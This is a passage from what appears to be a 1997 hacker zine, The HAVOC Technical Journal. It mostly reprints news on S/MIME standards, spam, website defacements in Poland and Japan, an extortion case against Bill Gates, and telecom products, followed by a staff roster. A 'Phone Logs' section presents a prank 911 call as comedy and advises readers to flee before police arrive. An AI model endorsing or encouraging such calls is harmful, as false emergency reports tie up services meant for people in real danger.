Engineering Task Force. RSA has offered S/MIME to the IETF as a proposed
standard for sending encrypted email. But at the last IETF meeting in
Memphis, Tennessee, a number of objections were raised:

1.S/MIME is a trademark of RSA Data Security. In order for it to be a
standard, RSA would have to give up the trademark.

2.The S/MIME standard currently requires that any implementation be able to
encrypt and decrypt data using the RC2 data-encryption algorithm and the RSA
public key algorithm. Although RC2 has been published on the Internet, the
algorithm is still officially an RSA Data Security proprietary technology,
and the company has threatened to take legal action against any firm that
implements the algorithm without a license. As for the RSA algorithm, it's
patent isn't up until the year 2000.

3.Finally, S/MIME's requirement that any implementation be able to encrypt
and decrypt messages with a 40-bit key doesn't sit well with IETF's technical
gurus, who don't want to approve a standard that requires weak crypto just so
US companies can sell their wares overseas. IETF's charter is to create the
best standard possible, not to create a standard that is in the interests of
US businesses.

"S/MIME in its current incarnation cannot become an Internet standard," says
Jeff Schiller, who heads the IETF's section on security. "So basically, one
of three things has to happen. One is that the RSA people give the IETF
people the appropriate rights to the trademark. Either they have to give up
on RC2 and allow other public key algorithms - it should be possible to
implement this Internet standard without having to buy technology from RSA.
Or the IETF needs to develop something [for which] all the rights are
available."

RSA has until 1 July to make up its mind, Schiller says.

The standard may already be moot. With Microsoft and Netscape poised to ship
millions of programs that implement S/MIME, there certainly will be encrypted
email for anybody who wants it. On the other hand, it would be nice if there
were an international email encryption standard that wasn't hobbled by 40-bit
restrictions.

The real losers in all this are Phil Zimmermann and PGP Inc. That's because
the same rules that prevent Netscape or Microsoft from selling strong crypto
overseas also block PGP from doing the same. PGP's only market is the United
States, and it is competing against Microsoft's free Outlook Express - which
is a pretty darn good email program - and Netscape's Communicator, which does
a much better job of integration than PGP can with its plug-in.

©Packet
_____________________________________________________________

Hong Kong Is Asia's Spam Epicenter
By Eric Lai, IT Daily.

HONG KONG, 1997 MAY 14 (NB) -- The Spam capital of Asia? Without a doubt,
Hong Kong. Two big reasons: Hong Kong's pro-business culture and the
proliferation of ISPs.

The Office of Telecommunications Authority says that under the existing
licence for ISPs, the "transmission of unsolicited advertising information or
unsolicited promotional information" is forbidden because it is a public
nuisance.

The problem is enforcement. OFTA says that regulating junk e-mail is up to
individual service providers. Hong Kong ISPs informally agree to help each
other find and terminate spammer accounts, according to Daniel Ng, president
of the Hong Kong Internet Service Provider Association, a local trade group,
and Hongkong Star Internet.

But as evidenced by complaints from Internet users around the world, local
ISPs have been a little lax in cracking down on spammers. Part of the problem
is the sheer number of ISPs here. The territory has around 60 ISPs, serving,
according to IDC, around 114,000 subscribers. The resulting heavy competition
means that earnest spammers can cheaply and easily hold multiple accounts.

Singapore, by contrast, has about the same number of Internet users, but due
to an arduous licensing process, only three commercial service providers.
Singapore regulations restrict access to political and sexual material on the
Internet, but they don't ban junk e-mail. The Singapore Broadcast Authority
and the Telecommunications Authority of Singapore don't regulate junk e-mail,
or junk faxes, either. The SBA says they only deal with broadcasting and
broadcasting material, while the TAS says it doesn't deal with content.

In the absence of formal rules, Singaporean ISPs have decided to follow
accepted netiquette and stop spam when they find it. "Basically spammers are
a nuisance," says Maureen Tseng, communication manager for Pacific Internet.
While bulk e-mailers have never inadvertently crashed Pacific Internet's mail
servers, they have slowed down performance in "isolated instances." Tseng, as
well as officials from CyberWay, another ISP, agreed that commercial spamming
has not been a major problem.

In the Philippines, there are also more than 60 service providers and no
formal regulations against junk e-mail. But commercial junk E-mails are also
relatively unknown, according to industry executives there. "We're just not
that technologically advanced," quipped a manager at InfoCom, the
Philippines' largest ISP.

Could it be Hong Kong's fabled moneymaking culture which, at the very least,
does not actively frown upon efforts to make a buck? Chapman Chow of Active
Promotion thinks so. Out of more than 3,000 e-mails from Internet users
requesting to be taken off Active Promotion's list, Chow claims he "didn't
get any upset replies." This, he says, indicates that Hong Kong citizens are
more accepting of junk e-mail. Alamo Music's Alleva says about 10 percent of
the replies to his bulk e-mails, sent to Hong Kong and global Internet users,
are negative. But Alleva's statistics aren't necessarily accurate because,
for one thing, his software automatically "bounces back" any messages from
irate users who use foul language.

Creating commercial Web sites is cheap, but it's not an effective marketing
tool unless you get visitors. Bulk e-mail is attractive because it can reach
huge numbers at practically no cost.

Spammers rave about how cheap it all is. But like selfish children, they
conveniently ignore the hard fact that someone is picking up the bill for
them. In most cases, it is the ISPs who have to purchase more computers to
process the extra e-mail traffic. Netvigator, for instance, cited an
overloaded and subsequently crashed e-mail computer to Alleva as its official
reason for terminating his "ccr" account. More staff is also required to
field complaints from subscribers and Internet users worldwide.

Spam recipients aren't spared, as they must spend time downloading, reading
and deleting unwanted e-mail, ask to be removed from junk e-mail lists, or
implement filters to block out spam.

©1997 Newsbytes
_____________________________________________________________

Polish Govt Web Site Hacked - Police Investigate
By Sylvia Dennis

WARSAW, POLAND, 1997 MAY 9 (NB) -- Polish government officials were outraged
this week when it was revealed that the Cabinet office's newly established
Web site had been altered by Polish hackers calling themselves Damage Inc.

The Cabinet Web site has now been taken offline, but a copy of the altered
Web site can be found at http:/www.software.com.pl/intdev /news/welcomep.html
the site of the Net security Institute in Warsaw.

The hackers altered much of the data on the site by uploading their own pages
last weekend, with headers such as "Hackpolska Polska (Hackrepublic of
Poland) and the "Centrum DizinInformacyjne Polska" (Polish Government
Disinformation Center."

Links from the Cabinet office site were rerouted to a number of sexually
explicit sites. For example, the routes from the site to information about
the Prime Minister route to http://www.playboy.com .

Interestingly, many of the routes from the Web site appear to have been
trashed, and supporting images on the Web site (GIFs) no longer load as
requested. This suggests that the hackers used a "quick and dirty" method of
trashing the site, rather than taking their time.

Gazeta Wyborcza, the Polish daily newspaper, reports that the police, at the
express request of the government, have set up a task force to track down the
hackers, who are thought to reside in Poland.

What the hackers may not be aware of, Newsbytes notes, is that Polska Telecom
is still a state operation, and that listings of telephone accesses to the
Internet are freely available to the Polish secret service. It seems logical
to assume that the police are now hot on the trail of the hackers.

At a press briefing in Warsaw to discuss the hack, the most serious in Polish
history, government spokesperson Aleksandra Jakubowska said that the
government Web server has been disconnected from the Internet until new
security systems are installed.

Considerable anti-hacking fury has been generated by the hack, and Newsbytes'
sources suggest that this may be the catalyst for the Polish government to
formulate its own computer misuse legislation. As Poland is now on the way to
joining the European Community, this unexpected step, by "Damage Inc" could
bring the creation of the legislation forward by several years.

©1997 Newsbytes
_____________________________________________________________

Gates Harasser Charged
(05/16/97; 11:00 a.m. EDT)
By Christine Casatelli, TechWire

SEATTLE -- A 21-year-old Illinois man was arrested after threatening to kill
Microsoft chairman Bill Gates and his wife unless they paid him $5 million,
according to an Associated Press report Thursday.

Adam Quinn Pletcher is charged with making the threats in four letters sent
to Gates at Microsoft's Redmond, Wash., headquarters, the AP report said. A
federal grand jury here indicted Pletcher on Wednesday.

"Obviously, we have taken this threat very seriously," said Mark Murray, a
Microsoft spokesman. The matter was handled in a "rather routine matter" by
Microsoft security, local police and the FBI, he said.

"Bill was never involved in any way in the investigation," said Murray,
adding that he would not comment on whether Gates would be asked to testify.

The first letter, which was received March 14 and intercepted by Microsoft
security, demanded that Gates post a personal ad on America Online to
communicate with the writer.

The last letter, received April 17, told Gates he must put money in a foreign
bank no later than April 26 ``to avoid dying, among other things,'' the AP
report said. Also included in the letter was a computer disk to be used by
Gates to communicate with the writer, who is said to live in Long Grove, Ill.

"The writer cautioned Gates not to notify law enforcement, and that if Gates
did so, the writer could kill him with `one bullet from my rifle at a quarter
of a mile away,'" the court documents said.

Pletcher also has been the target of a civil lawsuit filed by Illinois
authorities charging that he operated a fraud scheme over the Internet, the
AP report said.

Neither Gates nor his wife were harmed, and the $5 million demand was not
paid, the AP report said.

Pletcher was released after posting $100,000 bail. If convicted of extortion,
he faces a maximum punishment of 20 years in jail and a $250,000 fine.

The arraignment is scheduled for May 22.

©CMP Media, 1996.
_____________________________________________________________

Java Bug Discovered
(05/18/97; 2:45 p.m. EDT)
By Deborah Gage, Computer Reseller News

JavaSoft has posted a statement on its web page acknowledging a Java
verifier bug found by researchers at the University of Washington.

A JavaSoft spokeswoman said the bug enables a class file to filter through
the Java verifier and possibly crash the Java Virtual Machine. JavaSoft does
not consider the bug a security bug because the University of Washington did
not do a security, or so-called denial-of-service, attack.

JavaSoft will issue a patch for Java licensees this week and a fix will go
out in version 1.1.2 of the Java Developers Kit, due within the next two
weeks.

The University of Washington is also working with Microsoft on bugs found in
the Internet Explorer browser, sources said. A Microsoft spokeswoman said,
however, that no similar announcement was planned and that she was unaware of
any bugs.

©CMP Media, 1996.
_____________________________________________________________

Anti-Microsoft Sites Rampant On Web
(05/20/97; 9:00 a.m. EDT)
By Malcolm Maclachlan , TechWire

REDMOND, Wash. -- In the Internet Age, you know you're a VIP when someone
creates a Website just to make fun of you.

No one is more of a VIP than Microsoft chairman Bill Gates. However, the most
mocked on the Internet seems to have taken the attitude that when you're the
biggest, you can take the punches.

"There is so much humor and parody on the Internet," said Kurt Winkelman,
cocreator of a spoof site known as Microcult. "Some of the bigger companies
take it as a compliment."

Microcult compares the software giant to a cult along the lines of Heaven's
Gate. It purports to offer products such as ActiveCult 97 and values
employees willing "to kill themselves for the sake of technology."

The site is the work of Wilmington, Del.-based Museum Mercantile Ltd., a Web
design and hosting firm run by Winkelman and two colleagues. However, far
from being Microsoft haters, the company uses many of its products and has
even done work for Microsoft.

The site just seemed like a fun thing to do, said Winkelman, adding that he
was inspired by another site -- Microsnot -- which included a press release
on Bill Gates buying England. Similarly, he said, some of the site's biggest
fans are Microsoft employees.

There are spoof sites for other companies, too, Winkelman said, including
Wired and CNet. No one, however, compares with Microsoft, he said. There is
now a Website dedicated exclusively toward cataloging Microsoft spoof sites,
called The MSBC Super List of Anti-Microsoft Websites, which contains more
than 80 such links.

Common themes include comparing Gates to Satan or Bill Clinton. Other links
include the The Boycott Microsoft page and the subtly named Microsoft Sucks
page. There is even The Bill Gates Personal Wealth Clock, which tries to keep
up to date with Gates' immense personal fortune.

Despite all the venom, Microsoft does not seem particularly concerned, even
with sites that copy its logos for hostile satire.

"Microsoft does not have any specific stance on spoof sites," a Microsoft
spokesman said. The software giant has not taken action against the
developers on any of the parody Websites, he said. "There are so many out
there, we just let them be."

©CMP Media, 1996.
_____________________________________________________________

World Wide Web to arrive on pay phones
May 20, 1997

TORONTO (Reuter) -- The World Wide Web might be coming to a pay phone near
you, thanks to a small Canadian multimedia company that teamed up Tuesday
with a Hong Kong telecommunications concern.

King Products Inc. said it received a $2.2 million order to supply multimedia
and Internet-ready pay phones to INFA Telecom Asia Ltd. of Hong Kong.

Called PowerPhones, the units will be installed in the Hong Kong Convention
and Exhibition Center in time for the July 1 handover ceremony marking the
transfer of the former British colony to China.

PowerPhones will also be installed in railway stations and other tourist
spots in Hong Kong and throughout China.

"The PowerPhone is a major advance from the pay phones of the past that we
have all become familiar with," King President Peter Richards said at a news
conference.

The wall-mounted unit is a combination pay phone and network computer that
allows the display of advertising, telephone directories, hotel and
restaurant reservations and other information.

Company officials explained that the phone can be used to find a restaurant,
make a reservation or call up a map for directions.

The phones will also allow users to send and receive e-mail and surf the
Internet, though these features will not be available immediately.

The phone comes with a handset, a color touch screen and a slot for so-called
smart cards and credit cards. It is powered by an Intel Corp. Pentium
processor and uses various Internet protocols and accessories to run videos.

"We expect to deploy the PowerPhone throughout Hong Kong and subsequently
into China over the course of the year," INFA Telecom Chairman Peter Tsang
said in a statement.

King, best known for its line of electronic kiosks in malls and other public
places, will make the units in Canada for INFA Telecom, which has operations
in 70 Chinese cities. iMagic Infomedia Technology Ltd. of Hong Kong is
providing software development for the product.

King officials said the PowerPhone will be distributed in North America but
could not give a date.

©1997 Reuters Limited.
_____________________________________________________________

Phone company says: Put your life on hold until we fix your line
Thursday, May 22, 1997
SILICON VALLEY DISPATCHES: MIKE CASSIDY

THIS TALK of high-speed communication, ISDN, T1, cellular, fax and the rest
makes Thomas Wyskida and Renata Kusiak laugh.

They have to laugh; otherwise they'd kill somebody.

It's been three months since they moved from tiny Wappingers Falls, N.Y., to
the self-proclaimed Heart of Silicon Valley, but the technology revolution
has eluded them entirely.

"I can't even call up to order a pizza," Wyskida, 28, says.

It's the phone, or the lack of one. They are discovering what thousands in
Silicon Valley know: Getting quick phone service around here is akin to
hitting the lottery. With job growth and the Internet boom, Pacific Bell had
a back-up of 2,000 service orders in its service area last week. People are
considering bequeathing their place in line to their children or
grandchildren.

Besides saying this will improve, the phone company says this is a good
thing. It means their services are really popular. They had no idea so many
would want so much -- second lines, high-speed computer connections -- so
fast.

"I think that we're in a fairly unique position in this part of the country,"
says Ho Blair, media relations manager. "There is an increased awareness and
sensitivity and state-of-the-art knowledge of telecommunications."

As one who manages media relations, Blair would rather you not call service
delays a problem.

"It's not a problem," he says. "It's quite frankly a situation of heavy
demand."

Which makes Wyskida laugh some more. The phone at the Sunnyvale home he
shares with Kusiak, 31, went dead April 6. Workers fixed the corroded cables
outside his house May 2. In between, he called Pac Bell every day asking for
help.

"I probably talked to every one of their operators in 30 days," he says. "I'm
probably on some kind of death list."

OK. It's not like his phone didn't work at all.

"At 3 o'clock in the morning, the phone would ring. You'd pick it up and
you'd hear loud noises and static."

And it's not like Pac Bell was unsympathetic. One operator suggested he
forward his calls to a neighbor. Wyskida was beginning to think California
was a very different place.

"I figured, it's the same country. How much different can it be?"

But there he was, using a liquor store pay phone to work on his job search
and call friends in New York. And, of course, to call Pac Bell, which did fix
the problem. The phone company even called to check in.

"It was somebody from the billing department," Wyskida says. "They wanted to
know if I received a bill yet."

©San Jose Mercury News 1997
_____________________________________________________________

Japanese Police Nab Computer User On Hacking Charges

TOKYO, JAPAN, 1997 MAY 26 (NB) -- By Martyn Williams. Japanese police said
Friday, they had arrested a Saitama prefecture resident on charges covered
by a recent computer hacking law, the first such time the law has been used.
The man replaced weather images on the home page of TV-Asahi, a national TV
network, with pornographic images.

Koichi Kuboshima, a 27-year old resident of Fujimi, Saitama Prefecture, just
north of Tokyo, allegedly exploited a function on the Web page that allows
users to upload weather information.

Police tracked down Kuboshima by gaining access to the records of an Internet
service provider that he reportedly used to carry out the hack. Local press
reports said the account was opened with a false credit card number and name.

Weather images were replaced with the images at 10am last Sunday morning and
the Web site was taken down at 10:10am when other users notified TV-Asahi.
The site was repaired and available again at 1pm.

If convicted, Kuboshima faces a fine up to one million yen ($8,635) and up to
five years behind bars.

©1997 Newsbytes
_____________________________________________________________

Opening Communication Between PCs and Phones
by Chris Oakes

11:58am 29.May.97.PDT -- Despite the possible uses of linking caller-ID
information to software on the PC, the long-available enabling products
haven't become household - or even SOHO - names. So far, offerings
exploiting caller-ID intelligence have been aimed at larger, multi-line
businesses.

Next month, one company hopes to make PC-based caller-ID technology more
commonplace. To manage the caller-ID information of a single voice line,
SOHOtools' Connect-ID, to be announced at the Atlanta Comdex show, will work
in concert with database and contact-management software to let a PC react to
incoming calls.

The company says its retail price, US$60, introduces a new market to "voice
communication management."

"A number of people have goofed around with caller ID," says SOHOtools
marketing director Don Wallis, "but it has never really been put into a
retail scenario."

The software-plus-hardware product touts call-tracking benefits via software
designed to work in concert with Windows personal information managers such
as Act and SideKick.

As they become compatible with telephony APIs like Microsoft's TAPI, these
and other applications can interact with telco-provided features like caller
ID. Combined with inter-application standards like Windows' Dynamic Data
Exchange, the potential actions initiated by a phone call multiply.

The most obvious use of caller ID for the SOHO market is to leverage caller
ID in a fashion similar to a big call center. When the call comes in, in
addition to being logged and tracked by a database, a wealth of caller
information is instantly accessed. SOHO users can be as responsive to
customers' needs and interests as a large corporate call center.

While increasingly sophisticated in email and fax communications, the PC has
lagged in the management of the voice phone call.

"The modem market had telephony all tied up," said Heather Poggimannis, VAR
program manager for Rochelle Communications, which has been selling caller-ID
PC products to businesses for several years. She says with the dominance of
the modem between the PC and a phone line, it's been hard for the more truly
telephony-oriented caller-ID device to make headway.

Modem-makers like US Robotics are now making caller-ID functionality standard
in their products, but without taking the technology beyond a software-based
version of simple caller-ID devices.

Nor does it often make sense to try to employ caller ID through a modem, she
says, since that line is usually tied up with data duties.

The combination technology also uniquely depends on the maneuvering of two
industries - the telco and PC industries, neither intimately familiar with
the other's market.

Within the PC retail market, Poggimannis says caller-ID products suffer
something of an identity crisis. Their vague "telephony" category - typically
conjuring up modems and online communications - has made them difficult for
stores to categorize and consumers to grasp.

Complicating the issue is the fact that caller ID has only barely become
available nationally, requiring the PC industry to wait while telcos iron out
the technology and upgrade networks for universal deployment.

"There's recently been a major push [for caller ID]," said Poggimannis, "but
only from the telco side of the street." And their side doesn't work with PC
applications in mind. "It's not their market."

Wallis is undaunted. "Our game plan is to come from the bottom up," he said.
If his company can satisfy people with four lines at a new price point of
less than $400, he reasons, it can generate the business to establish a
profitable retail market - ultimately creating a new category of "voice
management" products.

Meanwhile, for consumers, Jeff Johnson of Computer Professionals for Social
Responsibility sees as much misery as benefit from the convergence of the PC
with caller ID.

"Before, the technology necessary to invade our privacy could only be
afforded by large companies - the Fortune 500. Then the technology spread to
the Fortune 5000, and now it's about to spread to the Fortune 500,000. Is
that progress?"

©1993-97 Wired Ventures, Inc.
_____________________________________________________________

Phone giants talk of $50 billion deal
USA Today, May 28, 1997

AT&T and SBC Communications, the prior Southwestern Bell, are trying to come
up with a merger accord that would be worth $50 bil, the largest merger in
history. It would unite AT&T, which has a 52% market share in the US long
distance sector, and SBC which, since merging with Pacific Telesis, has a
25% market share in US local calling. Nevertheless, the merger would be
expected to face antitrust and regulatory hurdles. AT&T would become a
telecom giant with revenue of $80 bil/yr, which would be considerably larger
than the second largest phone firm, which is the merged Bell Atlantic-Nynex
with revenue in 1996 of $30 bil. Although AT&T does not have problems now,
problems can be expected in the future due to fierce competition from other
mergers. Detail is given to what the Justice Department's antitrust div can
be expected to examine in looking at the possible merger.

©1997 USA Today
_____________________________________________________________

13. HFStival on May 31st
The 8th Annual HFStival run by Scud-O's favorite local radio station,
WHFS 99.1 is going to take place this May 31st at RFK Stadium in Washington
DC. I hope you got your tickets early, as they sold out in a record 97 minutes
this year. This year, the tickets went for $20 ( plus a $3.50 service charge)
for 20 bands. The bands playing include: Prodigy, Beck, Cardigans, Jamiroquai,
Mighty Mighty Bosstones, Reel Big Fish, Squrel Nut Zippers, Summer Camp, Verve
Pipe, Kula Shaker, Local H, K's Choice, Jimmie's Chicken Shack, and........
SOUL COUGHING ( Look at the article after the editorial in this issue for more
info), and several other TBA bands.

[P H O N E L O G S]------------------------------------------------

<Scud-O>Ummm, hello there, 911?
<Operator>Yes, how may i direct your call
<Scud-O>Um, can you call my mommy for me?
<Operator>No sir, we dont do that, this line is needed for other calls
<Scud-O>Well, im hurt, i need help
<Operator>Whats wrong sir?
<Scud-O>I just kiiled someone
<Operator>Sir, is this a prank?
<Scud-O>No, im serious, i need help, he attacked me, and i fought back,
now he's dead!
<Operator>Who is dead sir?
<Scud-O>He is! I killed him!
<Operator>Sir, who did you kill?
<Scud-O>HIM! I KILLED HIM!
<Operator>Sir, im forwarding you to the police
<Scud-O>No, i need help, he needs to be stiched up
<Operator>Who needs to be stiched up?
<Scud-O>HE does, my teddy bear.
<Operator>Sir, this is a prank, please hang up.
<Scud-O>NO! Not until i get my mommy!
<Operator>Sir, calling up 911 without an emergancy is a crime, i am sending a
squad car out to your location.
<Scud-O>Well, ok, will they have my mommy?
<Operator>No, no they will not have your mommy
<Scud-O>Will they have a warm cuddy blanket for me?
<Operator>No
<Scud-O>Warm cookies and milk?
<Operator>NO!
<Scud-O>OK then, bye-bye.
[ C L I C K ]
NOTE: This was done in a local mall about 30 minutes before the stores opened,
so it was pretty quiet, but a squad car did show up, so next time you call
911, make sure you get away fast.


_____________________________________________________________

------------------------ ----------------------
-[HAVOC Bell Systems]- -[Acknowledgements]-
------------------------ ----------------------

ArcAngl : Just joined up
Agrajag : Back from the dead btm : Elite (MIA?)
darkcyde : #phreak old-schooler digipimp : Co-conspirator
Digital_X : Nemesis (MIA?) dr1x : It's 420!
disc0re : Thinks were on NBC ec|ipse : Hysterical bastard
Keystroke : Submissions Editor shamrock : nice hair
KungFuFox : Helped Reform #phreak RBCP : Funniest man alive
memor : Ueberleet French phreak shoelace : FINALLY has ops
psych0 : Lame ass mofo halflife : master idler
REality : Owns Own3r darc : Left #phreak
Scud-O : Has a new car! JP : Runs Antionline.com
Redtyde : #phreak not so old-schooler tombin : phear!
theLURK3R : Out Clubing antifire : NT security guru
UnaBomber : Tired of IRC (MIA?) ChiaPope : sniff, we miss wrath!
FH : He's so FUCKING HOSTILE!
------------------- TMessiah : Believes in 'Utopia'
-[ Channels ]- fsh : Text File Archiver
------------------- Modify : Lives near Scud-O
#phreak : Newly Reformed |Banshee| : Also lives near Scud-O
#hackteach: One Busy Channel mC : infected.com - nuff said!
#sin : SIN Home silitoad : Did ya like thtj?


_____________________________________________________________

This Month's Question: What the fuck is this m00 thing?
m00 v1.0 is a simple Firewall Defense Mechanism i am creating. I have
absolutly no idea when it will come out, so dont bug me about it.


_____________________________________________________________

Next Month:
Look, we can predict the future about as well as a weatherman, so
just chill out until july 1st to see what is going to be in thtj12!

Issue 12 is out July 1st!

Send all articles for issue 12 to Keystroke at: keystroke@thepentagon.com

Tune in next time, Same Bat Time, Same Bat Channel!

==========================================================
= Is this copy of The HAVOC Technical Journal skunked? =
= If this file doesn't read at 120924 bytes, it probably =
= doesn't have a born on date! Get a fresh copy from our =
= NEW site at: http://www.antionline.com/hbs/ =
==========================================================

-[End of Communique]-

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT